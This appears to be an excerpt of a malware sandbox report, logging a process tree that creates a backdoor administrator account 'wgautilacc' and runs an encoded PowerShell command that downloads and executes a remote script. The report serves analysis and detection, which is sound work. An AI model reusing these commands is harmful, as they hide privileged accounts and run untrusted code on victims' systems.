C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD3⤵PID:768
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc lLB8vtKv1⤵PID:3056
-
C:\Windows\system32\net.exenet.exe user wgautilacc lLB8vtKv2⤵PID:2692
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc lLB8vtKv3⤵PID:2096
-
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵PID:2700
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
PID:3436
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:3024
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵PID:3148
-
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:3896
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:2244
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:404
-
-
-
C:\Windows\System32\cmd.execmd.exe /C net user wgautilacc 12341⤵PID:3056
-
C:\Windows\system32\net.exenet user wgautilacc 12342⤵PID:2756
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc 12343⤵PID:580
-
-